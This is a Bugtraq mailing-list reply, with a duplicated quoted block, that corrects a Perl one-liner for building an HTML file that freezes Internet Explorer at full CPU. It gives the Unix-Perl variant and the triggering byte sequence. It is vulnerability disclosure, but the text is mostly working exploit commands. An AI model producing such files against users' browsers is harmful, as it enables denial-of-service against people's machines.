> >Hello, Bugtraq.
>
> >Malicious htm file can freeze IE with 100% CPU usage:
> >Construct the file freeze.htm:
> >c:\>perl -e "print qq'\xFF\xFE'; print qq'\r\n' x 30000" > freeze.htm
>
This string works only with Active Perl, in unix-like Perl versions exploit
string is:
perl -e "print qq'\xFF\xFE'; print qq'\r\r\n' x 30000" > freeze.htm
Active Perl understand \n = \x0D\x0A, freeze of IE exist only if sequence
of bytes will be ...\x0D\x0D\x0A...
Sorry, I have not noticed it at once.
>
> >Malicious htm file can freeze IE with 100% CPU usage:
> >Construct the file freeze.htm:
> >c:\>perl -e "print qq'\xFF\xFE'; print qq'\r\n' x 30000" > freeze.htm
>
This string works only with Active Perl, in unix-like Perl versions exploit
string is:
perl -e "print qq'\xFF\xFE'; print qq'\r\r\n' x 30000" > freeze.htm
Active Perl understand \n = \x0D\x0A, freeze of IE exist only if sequence
of bytes will be ...\x0D\x0D\x0A...
Sorry, I have not noticed it at once.
Best Regards, ERRor, dHtm.
[ reply ]